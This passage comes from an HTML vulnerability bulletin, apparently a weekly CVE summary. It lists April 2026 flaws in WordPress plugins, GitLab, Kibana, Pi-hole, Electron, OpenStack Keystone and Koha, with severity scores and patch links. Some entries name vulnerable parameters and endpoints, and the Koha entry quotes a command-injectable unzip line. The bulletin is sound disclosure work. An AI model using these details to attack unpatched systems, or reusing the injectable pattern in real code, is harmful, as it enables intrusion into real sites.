<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3de1= a4-a534-475b-9138-2337755b0288?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3de1a4-a53= 4-475b-9138-2337755b0288?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7= -db-admin.php#L1507" target=3D"_blank" rel=3D"noopener">https://plugins.tra= c.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7= -db-admin.php#L1507</a><br><a href=3D"https://plugins.trac.wordpress.org/ch= angeset/3497481/advanced-cf7-db" target=3D"_blank" rel=3D"noopener">https:/= /plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">realmag777--BEAR Bulk Editor and Products Mana= ger Professional for WooCommerce by Pluginus.Net</td>
<td>The BEAR - Bulk Editor and Products Manager Professional for WooCommerc=
e by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request = Forgery in all versions up to, and including, 1.1.5. This is due to missing=
nonce validation on the woobe_delete_tax_term() function. This makes it po= ssible for unauthenticated attackers to delete WooCommerce taxonomy terms (= categories, tags, etc.) via a forged request granted they can trick a site = administrator or shop manager into performing an action such as clicking on=
a link.</td>
<td>2026-04-08</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1673" target=3D"= _blank" rel=3D"noopener">CVE-2026-1673</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e89= 60-b0c1-4dbb-ba97-e45b88fb06c0?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e8960-b0c= 1-4dbb-ba97-e45b88fb06c0?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L1474" target=3D"_b= lank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/woo-bulk-= editor/trunk/index.php#L1474</a><br><a href=3D"https://plugins.trac.wordpre= ss.org/changeset/3457263/" target=3D"_blank" rel=3D"noopener">https://plugi= ns.trac.wordpress.org/changeset/3457263/</a><br><a href=3D"https://plugins.= trac.wordpress.org/changeset/3465138/" target=3D"_blank" rel=3D"noopener">h= ttps://plugins.trac.wordpress.org/changeset/3465138/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">GitLab--GitLab</td>
<td>GitLab has remediated an issue in GitLab EE affecting all versions from=
11.3 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that coul=
d have allowed an authenticated user with developer-role permissions to mod= ify protected environment settings due to improper authorization checks in = the API.</td>
<td>2026-04-08</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1752" target=3D"= _blank" rel=3D"noopener">CVE-2026-1752</a></td>

<a href=3D"https://hackerone.com/reports/3533545" target=3D"_blank" rel=3D"= noopener">HackerOne Bug Bounty Report #3533545</a><br><a href=3D"https://gi= tlab.com/gitlab-org/gitlab/-/work_items/588413" target=3D"_blank" rel=3D"no= opener">https://gitlab.com/gitlab-org/gitlab/-/work_items/588413</a><br><a = href=3D"https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-1= 8-10-3-released/" target=3D"_blank" rel=3D"noopener">https://about.gitlab.c= om/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">arubadev--Aruba HiSpeed Cache</td>
<td>The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Sit=
e Request Forgery in all versions up to, and including, 3.0.4. This is due =
to missing nonce verification on the `ahsc_ajax_reset_options()` function. = This makes it possible for unauthenticated attackers to reset all plugin se= ttings to their default values via a forged request granted they can trick =
a site administrator into performing an action such as clicking on a link.<=

<td>2026-04-10</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1924" target=3D"= _blank" rel=3D"noopener">CVE-2026-1924</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/d22301= 51-fde2-43d6-8bff-0d2ffd559ab3?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/d2230151-fde= 2-43d6-8bff-0d2ffd559ab3?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.= php#L632" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress= .org/browser/aruba-hispeed-cache/tags/3.0.4/aruba-hispeed-cache.php#L632</a= ><br><a href=3D"https://plugins.trac.wordpress.org/browser/aruba-hispeed-ca= che/tags/3.0.4/aruba-hispeed-cache.php#L631" target=3D"_blank" rel=3D"noope= ner">https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.= 0.4/aruba-hispeed-cache.php#L631</a><br><a href=3D"https://plugins.trac.wor= dpress.org/changeset?old_path=3D%2Faruba-hispeed-cache/tags/3.0.4&new_path= =3D%2Faruba-hispeed-cache/tags/3.0.5" target=3D"_blank" rel=3D"noopener">ht= tps://plugins.trac.wordpress.org/changeset?old_path=3D%2Faruba-hispeed-cach= e/tags/3.0.4&new_path=3D%2Faruba-hispeed-cache/tags/3.0.5</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">GitLab--GitLab</td>
<td>GitLab has remediated an issue in GitLab CE/EE affecting all versions f= rom 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that c= ould have allowed an authenticated user to access confidential issues assig= ned to other users via CSV export due to insufficient authorization checks.= </td>
<td>2026-04-08</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-2104" target=3D"= _blank" rel=3D"noopener">CVE-2026-2104</a></td>

<a href=3D"https://hackerone.com/reports/3541476" target=3D"_blank" rel=3D"= noopener">HackerOne Bug Bounty Report #3541476</a><br><a href=3D"https://gi= tlab.com/gitlab-org/gitlab/-/work_items/589021" target=3D"_blank" rel=3D"no= opener">https://gitlab.com/gitlab-org/gitlab/-/work_items/589021</a><br><a = href=3D"https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-1= 8-10-3-released/" target=3D"_blank" rel=3D"noopener">https://about.gitlab.c= om/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">idealwebdesignlk--Whole Enquiry Cart for WooCo= mmerce</td>
<td>The Whole Enquiry Cart for WooCommerce plugin for WordPress is vulnerab=
le to Stored Cross-Site Scripting via the 'woowhole_success_msg' parameter =
in all versions up to, and including, 1.2.1 due to insufficient input sanit= ization and output escaping. This makes it possible for authenticated attac= kers, with administrator-level access, to inject arbitrary web scripts in p= ages that will execute whenever a user accesses an injected page. This only=
affects multi-site installations and installations where unfiltered_html h=
as been disabled.</td>
<td>2026-04-08</td>
<td>4.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-2838" target=3D"= _blank" rel=3D"noopener">CVE-2026-2838</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc14a= 98-1df8-480b-bae3-5ec057b498af?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc14a98-1df= 8-480b-bae3-5ec057b498af?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/whole-cart-enquiry/trunk/admin.php#L53" target=3D"_= blank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/whole-ca= rt-enquiry/trunk/admin.php#L53</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">homarr-labs--homarr</td>
<td>Homarr is an open-source dashboard. Prior to 1.57.0, the user registrat= ion endpoint (/api/trpc/user.register) is vulnerable to a race condition th=
at allows an attacker to create multiple user accounts from a single-use in= vite token. The registration flow performs three sequential database operat= ions without a transaction: CHECK, CREATE, and DELETE. Because these operat= ions are not atomic, concurrent requests can all pass the validation step (=
1) before any of them reaches the deletion step (3). This allows multiple a= ccounts to be registered using a single invite token that was intended to b=
e single-use. This vulnerability is fixed in 1.57.0.</td>
<td>2026-04-06</td>
<td>4.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32602" target=3D= "_blank" rel=3D"noopener">CVE-2026-32602</a></td>

<a href=3D"https://github.com/homarr-labs/homarr/security/advisories/GHSA-v= fw3-53q9-2hp8" target=3D"_blank" rel=3D"noopener">https://github.com/homarr= -labs/homarr/security/advisories/GHSA-vfw3-53q9-2hp8</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0= -RC.3, an Open Redirect vulnerability in the session course edit page allow=
s an attacker to redirect an authenticated administrator to an arbitrary ex= ternal URL after saving coach assignment changes. The redirect also leaks t=
he id_session parameter to the attacker's server. This vulnerability is fix=
ed in 1.11.38 and 2.0.0-RC.3.</td>
<td>2026-04-10</td>
<td>4.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-32932" target=3D= "_blank" rel=3D"noopener">CVE-2026-32932</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= q2cp-3qj3-wx8q" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-q2cp-3qj3-wx8q</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/b005b3d3e76cf6eafc03e15ac445cef= f089551c0" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/b005b3d3e76cf6eafc03e15ac445ceff089551c0</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ff= aaf9102ebd2b" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo= /chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ffaaf9102ebd2b</a><br>=C2=A0<=

</tr>

<td class=3D"vendor-product">Microsoft--Microsoft Edge (Chromium-based)</td=

<td>Microsoft Edge (Chromium-based) Spoofing Vulnerability</td> <td>2026-04-10</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33118" target=3D= "_blank" rel=3D"noopener">CVE-2026-33118</a></td>

<a href=3D"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-3= 3118" target=3D"_blank" rel=3D"noopener">Microsoft Edge (Chromium-based) Sp= oofing Vulnerability</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Elastic--Kibana</td>
<td>Incorrect Authorization (CWE-863) in Kibana can lead to cross-space inf= ormation disclosure via Privilege Abuse (CAPEC-122). A user with Fleet agen=
t management privileges in one Kibana space can retrieve Fleet Server polic=
y details from other spaces through an internal enrollment endpoint. The en= dpoint bypasses space-scoped access controls by using an unscoped internal = client, returning operational identifiers, policy names, management state, = and infrastructure linkage details from spaces the user is not authorized t=
o access.</td>
<td>2026-04-08</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33460" target=3D= "_blank" rel=3D"noopener">CVE-2026-33460</a></td>

<a href=3D"https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security= -update-esa-2026-25/385813" target=3D"_blank" rel=3D"noopener">https://disc= uss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-25/385= 813</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">themeum--Tutor LMS eLearning and online course=
solution</td>
<td>The Tutor LMS - eLearning and online course solution plugin for WordPre=
ss is vulnerable to Insecure Direct Object Reference in all versions up to,=
and including, 3.9.7. This is due to missing authorization checks in the `= save_course_content_order()` private method, which is called unconditionall=
y by the `tutor_update_course_content_order` AJAX handler. While the handle= r's `content_parent` branch includes a `can_user_manage()` check, the `save= _course_content_order()` call processes attacker-supplied `tutor_topics_les= sons_sorting` JSON without any ownership or capability verification. This m= akes it possible for authenticated attackers with Subscriber-level access o=
r above to detach lessons from topics, reorder course content, and reassign=
lessons between topics in any course, including admin-owned courses, by se= nding a crafted AJAX request with manipulated topic and lesson IDs.</td> <td>2026-04-11</td>
<td>4.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3371" target=3D"= _blank" rel=3D"noopener">CVE-2026-3371</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf04= 30-8577-449a-aefe-d7bf606fe2de?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf0430-857= 7-449a-aefe-d7bf606fe2de?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/tutor/trunk/classes/Course.php#L1687" target=3D"_bl= ank" rel=3D"noopener">https://plugins.trac.wordpress.org/browser/tutor/trun= k/classes/Course.php#L1687</a><br><a href=3D"https://plugins.trac.wordpress= .org/browser/tutor/trunk/classes/Course.php#L1755" target=3D"_blank" rel=3D= "noopener">https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/C= ourse.php#L1755</a><br><a href=3D"https://plugins.trac.wordpress.org/browse= r/tutor/trunk/classes/Course.php#L252" target=3D"_blank" rel=3D"noopener">h= ttps://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2= 52</a><br><a href=3D"https://plugins.trac.wordpress.org/changeset?old_path= =3D%2Ftutor/tags/3.9.7&new_path=3D%2Ftutor/tags/3.9.8" target=3D"_blank" re= l=3D"noopener">https://plugins.trac.wordpress.org/changeset?old_path=3D%2Ft= utor/tags/3.9.7&new_path=3D%2Ftutor/tags/3.9.8</a><br>=C2=A0</td>
</tr>
</tbody>
</table>
<p><a href=3D"#top">Back to top</a></p>
</div>
<div id=3D"low_v">
<h2 id=3D"low_v_title">Low Vulnerabilities</h2>
<table class=3D"table no-tablesaw" style=3D"table-layout: fixed; width: 100= %;" border=3D"1" summary=3D"Low Vulnerabilities" align=3D"center">
<thead>

<th class=3D"vendor-product" style=3D"width: 24%;" scope=3D"col">
<span class=3D"primary-vendor">Primary</span><br><span class=3D"primary-ven= dor">Vendor</span> -- Product</th>
<th style=3D"width: 44%;" scope=3D"col">Description</th>
<th style=3D"width: 10%;" scope=3D"col">Published</th>
<th style=3D"width: 8%;" scope=3D"col">CVSS Score</th>
<th style=3D"width: 7%;" scope=3D"col">Source Info</th>
<th style=3D"width: 7%;" scope=3D"col">Patch Info</th>
</tr>
</thead>
<tbody>

<td class=3D"vendor-product">Mattermost--Mattermost</td>
<td>Mattermost Plugins versions &lt;=3D2.3.1 fail to limit the request body=
size on the {{/lifecycle}} webhook endpoint which allows an authenticated = attacker to cause memory exhaustion and denial of service via sending an ov= ersized JSON payload. Mattermost Advisory ID: MMSA-2026-00610</td> <td>2026-04-09</td>
<td>3.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21388" target=3D= "_blank" rel=3D"noopener">CVE-2026-21388</a></td>

<a href=3D"https://mattermost.com/security-updates" target=3D"_blank" rel= =3D"noopener">MMSA-2026-00610</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Dell--PowerProtect Agent</td>
<td>Dell PowerProtect Agent Service, version(s) prior to 20.1, contain(s) a=
n Incorrect Permission Assignment for Critical Resource vulnerability. A lo=
w privileged attacker with local access could potentially exploit this vuln= erability, leading to Information exposure.</td>
<td>2026-04-08</td>
<td>3.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28264" target=3D= "_blank" rel=3D"noopener">CVE-2026-28264</a></td>

<a href=3D"https://www.dell.com/support/kbdoc/en-us/000447277/dsa-2026-158-= security-update-dell-powerprotect-data-manager-for-multiple-security-vulner= abilities" target=3D"_blank" rel=3D"noopener">https://www.dell.com/support/= kbdoc/en-us/000447277/dsa-2026-158-security-update-dell-powerprotect-data-m= anager-for-multiple-security-vulnerabilities</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">pi-hole--web</td>
<td>Pi-hole Admin Interface is a web interface for managing Pi-hole, a netw= ork-level ad and internet tracker blocking application. From 6.0 to before = 6.5, client hostnames and IP addresses from the FTL database are rendered i= nto the DOM without escaping in network.js (Network page) and charts.js/ind= ex.js (Dashboard chart tooltips). While upstream validation in dnsmasq and = FTL blocks HTML characters via normal DHCP/DNS paths, the web UI performs n=
o output escaping - an inconsistency with other fields in the same file tha=
t are properly escaped. This vulnerability is fixed in 6.5.</td> <td>2026-04-06</td>
<td>3.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33404" target=3D= "_blank" rel=3D"noopener">CVE-2026-33404</a></td>

<a href=3D"https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85w= p-ww9v" target=3D"_blank" rel=3D"noopener">https://github.com/pi-hole/web/s= ecurity/advisories/GHSA-px6w-85wp-ww9v</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">pi-hole--web</td>
<td>Pi-hole Admin Interface is a web interface for managing Pi-hole, a netw= ork-level ad and internet tracker blocking application. From 6.0 to before = 6.5, the formatInfo() function in queries.js renders data.upstream, data.cl= ient.ip, and data.ede.text into HTML without escaping when a user expands a=
query row in the Query Log, enabling stored HTML injection. JavaScript exe= cution is blocked by the server's CSP (script-src 'self'). The same fields = are properly escaped in the table view (rowCallback), confirming the omissi=
on was an oversight. This vulnerability is fixed in 6.5.</td> <td>2026-04-06</td>
<td>3.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33405" target=3D= "_blank" rel=3D"noopener">CVE-2026-33405</a></td>

<a href=3D"https://github.com/pi-hole/web/security/advisories/GHSA-jx8x-mj2= r-62vq" target=3D"_blank" rel=3D"noopener">https://github.com/pi-hole/web/s= ecurity/advisories/GHSA-jx8x-mj2r-62vq</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">OpenStack--Keystone</td>
<td>An issue was discovered in OpenStack Keystone 14 through 26 before 26.1= .1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can crea=
te EC2 credentials. By using a restricted application credential to call th=
e EC2 credential creation API, an authenticated user with only a reader rol=
e may obtain an EC2/S3 credential that carries the full set of the parent u= ser's S3 permissions, effectively bypassing the role restrictions imposed o=
n the application credential. Only deployments that use restricted applicat= ion credentials in combination with the EC2/S3 compatibility API (swift3 / = s3api) are affected.</td>
<td>2026-04-10</td>
<td>3.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33551" target=3D= "_blank" rel=3D"noopener">CVE-2026-33551</a></td>

<a href=3D"https://bugs.launchpad.net/keystone/+bug/2142138" target=3D"_bla= nk" rel=3D"noopener">https://bugs.launchpad.net/keystone/+bug/2142138</a><b= r><a href=3D"https://security.openstack.org/ossa/OSSA-2026-005.html" target= =3D"_blank" rel=3D"noopener">https://security.openstack.org/ossa/OSSA-2026-= 005.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">harttle--liquidjs</td>
<td>LiquidJS is a Shopify / GitHub Pages compatible template engine in pure=
JavaScript. Prior to 10.25.3, the replace filter in LiquidJS incorrectly a= ccounts for memory usage when the memoryLimit option is enabled. It charges=
str.length + pattern.length + replacement.length bytes to the memory limit= er, but the actual output from str.split(pattern).join(replacement) can be = quadratically larger when the pattern occurs many times in the input string=
. This allows an attacker who controls template content to bypass the memor= yLimit DoS protection with approximately 2,500x amplification, potentially = causing out-of-memory conditions. This vulnerability is fixed in 10.25.3.</=

<td>2026-04-08</td>
<td>3.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34166" target=3D= "_blank" rel=3D"noopener">CVE-2026-34166</a></td>

<a href=3D"https://github.com/harttle/liquidjs/security/advisories/GHSA-mmg= 9-6m6j-jqqx" target=3D"_blank" rel=3D"noopener">https://github.com/harttle/= liquidjs/security/advisories/GHSA-mmg9-6m6j-jqqx</a><br><a href=3D"https://= github.com/harttle/liquidjs/commit/abc058be0f33d6372cd2216f4945183167abeb25=
" target=3D"_blank" rel=3D"noopener">https://github.com/harttle/liquidjs/co= mmit/abc058be0f33d6372cd2216f4945183167abeb25</a><br><a href=3D"https://git= hub.com/harttle/liquidjs/releases/tag/v10.25.3" target=3D"_blank" rel=3D"no= opener">https://github.com/harttle/liquidjs/releases/tag/v10.25.3</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">electron--electron</td>
<td>Electron is a framework for writing cross-platform desktop applications=
using JavaScript, HTML and CSS. From 33.0.0-alpha.1 to before 39.8.5, 40.8= .5, 41.1.0, and 42.0.0-alpha.5, apps that use offscreen rendering with GPU = shared textures may be vulnerable to a use-after-free. Under certain condit= ions, the release() callback provided on a paint event texture can outlive = its backing native state, and invoking it after that point dereferences fre=
ed memory in the main process, which may lead to a crash or memory corrupti= on. Apps are only affected if they use offscreen rendering with webPreferen= ces.offscreen: { useSharedTexture: true }. Apps that do not enable shared-t= exture offscreen rendering are not affected. To mitigate this issue, ensure=
texture.release() is called promptly after the texture has been consumed, = before the texture object becomes unreachable. This vulnerability is fixed =
in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5.</td>
<td>2026-04-06</td>
<td>2.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34764" target=3D= "_blank" rel=3D"noopener">CVE-2026-34764</a></td>

<a href=3D"https://github.com/electron/electron/security/advisories/GHSA-8x= 5q-pvf5-64mp" target=3D"_blank" rel=3D"noopener">https://github.com/electro= n/electron/security/advisories/GHSA-8x5q-pvf5-64mp</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">electron--electron</td>
<td>Electron is a framework for writing cross-platform desktop applications=
using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.= 0-alpha.5, apps that call clipboard.readImage() may be vulnerable to a deni=
al of service. If the system clipboard contains image data that fails to de= code, the resulting null bitmap is passed unchecked to image construction, = triggering a controlled abort and crashing the process. Apps are only affec= ted if they call clipboard.readImage(). Apps that do not read images from t=
he clipboard are not affected. This issue does not allow memory corruption =
or code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, a=
nd 42.0.0-alpha.5.</td>
<td>2026-04-07</td>
<td>2.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34781" target=3D= "_blank" rel=3D"noopener">CVE-2026-34781</a></td>

<a href=3D"https://github.com/electron/electron/security/advisories/GHSA-f3= 7v-82c4-4x64" target=3D"_blank" rel=3D"noopener">https://github.com/electro= n/electron/security/advisories/GHSA-f37v-82c4-4x64</a><br>=C2=A0</td>
</tr>
</tbody>
</table>
<p><a href=3D"#top">Back to top</a></p>
</div>
<div id=3D"snya_v">
<h2 id=3D"snya_v_title">Severity Not Yet Assigned</h2>
<table id=3D"table_severity_not_yet_assigned" class=3D"table no-tablesaw" s= tyle=3D"table-layout: fixed; width: 100%;" border=3D"1" summary=3D"Severity=
Not Yet Assigned" align=3D"center">
<thead>

<th class=3D"vendor-product" style=3D"width: 24%;" scope=3D"col">
<span class=3D"primary-vendor">Primary</span><br><span class=3D"primary-ven= dor">Vendor</span> -- Product</th>
<th style=3D"width: 44%;" scope=3D"col">Description</th>
<th style=3D"width: 10%;" scope=3D"col">Published</th>
<th style=3D"width: 8%;" scope=3D"col">CVSS Score</th>
<th style=3D"width: 7%;" scope=3D"col">Source Info</th>
<th style=3D"width: 7%;" scope=3D"col">Patch Info</th>
</tr>
</thead>
<tbody>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. From 1.11.0 to 2.0-beta.1,=
anyone can trigger a malicious redirect through the use of the redirect pa= rameter to /login. This vulnerability is fixed in 2.0-beta.2.</td> <td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-66447" target=3D= "_blank" rel=3D"noopener">CVE-2025-66447</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= m82x-prv3-rwwv" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-m82x-prv3-rwwv</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342db= ae5cbc446" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/73ae6293adaa6098374bc22625342dbae5cbc446</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">n/a--Stakeholder-Specific Vulnerability Catego= rization (SSVC)</td>
<td>QD 20230821 is vulnerable to Server-side request forgery (SSRF) via a c= rafted request</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2023-46945" target=3D= "_blank" rel=3D"noopener">CVE-2023-46945</a></td>

<a href=3D"https://qd-today.github.io/qd/" target=3D"_blank" rel=3D"noopene= r">https://qd-today.github.io/qd/</a><br><a href=3D"https://gist.github.com= /kurokoleung/5b36b2013a54adadcce79967d3e4f056" target=3D"_blank" rel=3D"noo= pener">https://gist.github.com/kurokoleung/5b36b2013a54adadcce79967d3e4f056= </a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--Koha 23.05.10</td>
<td>Koha Library before 23.05.10 fails to sanitize user-controllable filena= mes prior to unzipping, leading to remote code execution. The line "qx/unzi=
p $filename -d $dirname/;" in upload-cover-image.pl is vulnerable to comman=
d injection via shell metacharacters because input data can be controlled b=
y an attacker and is directly included in a system command, i.e., an attack=
can occur via malicious filenames after uploading a .zip file and clicking=
Process Images.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2024-36057" target=3D= "_blank" rel=3D"noopener">CVE-2024-36057</a></td>

<a href=3D"https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/relea= se_notes/release_notes_23_05_10.md" target=3D"_blank" rel=3D"noopener">http= s://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/releas= e_notes_23_05_10.md</a><br><a href=3D"https://gitlab.com/koha-community/Koh= a/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md" target=3D"_b= lank" rel=3D"noopener">https://gitlab.com/koha-community/Koha/-/blob/23.05.= x/misc/release_notes/release_notes_23_05_11.md</a><br><a href=3D"https://gi= thub.com/hacklantic/Research/tree/main/CVE-2024-36057" target=3D"_blank" re= l=3D"noopener">https://github.com/hacklantic/Research/tree/main/CVE-2024-36= 057</a><br><a href=3D"https://koha-community.org/koha-22-05-22-released/" t= arget=3D"_blank" rel=3D"noopener">https://koha-community.org/koha-22-05-22-= released/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--Koha 23.05.10</td>
<td>The Send Basket functionality in Koha Library before 23.05.10 is suscep= tible to Time-Based SQL Injection because it fails to sanitize the POST par= ameter bib_list in /cgi-bin/koha/opac-sendbasket.pl, allowing library users=
to read arbitrary data from the database.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2024-36058" target=3D= "_blank" rel=3D"noopener">CVE-2024-36058</a></td>

<a href=3D"https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/relea= se_notes/release_notes_23_05_10.md" target=3D"_blank" rel=3D"noopener">http= s://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/releas= e_notes_23_05_10.md</a><br><a href=3D"https://gitlab.com/koha-community/Koh= a/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md" target=3D"_b= lank" rel=3D"noopener">https://gitlab.com/koha-community/Koha/-/blob/23.05.= x/misc/release_notes/release_notes_23_05_11.md</a><br><a href=3D"https://ko= ha-community.org/koha-22-05-22-released/" target=3D"_blank" rel=3D"noopener= ">https://koha-community.org/koha-22-05-22-released/</a><br><a href=3D"http= s://github.com/hacklantic/Research/tree/main/CVE-2024-36058" target=3D"_bla= nk" rel=3D"noopener">https://github.com/hacklantic/Research/tree/main/CVE-2= 024-36058</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Unknown--YML for Yandex Market</td>
<td>The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable =
to Remote Code Execution via the feed generation process.</td> <td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14545" target=3D= "_blank" rel=3D"noopener">CVE-2025-14545</a></td>

<a href=3D"https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a= 56fbc/" target=3D"_blank" rel=3D"noopener">https://wpscan.com/vulnerability= /9bb1a4ca-976c-461d-82de-8a3b04a56fbc/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Canonical--Ubuntu</td>
<td>In Ubuntu, Subiquity version 24.04.4 could leak sensitive user credenti= als during crash reporting. Upon installation failure, if a user submitted =
a bug report to Launchpad, Subiquity could include certain user credentials=
, such as the user's plaintext Wi-Fi password, in the attached logs.</td> <td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14551" target=3D= "_blank" rel=3D"noopener">CVE-2025-14551</a></td>

<a href=3D"https://github.com/canonical/subiquity/pull/2358" target=3D"_bla= nk" rel=3D"noopener">noble backport - stop logging network config and ident= ity data</a><br><a href=3D"https://github.com/canonical/subiquity/pull/2357=
" target=3D"_blank" rel=3D"noopener">Stop logging identity data and network=
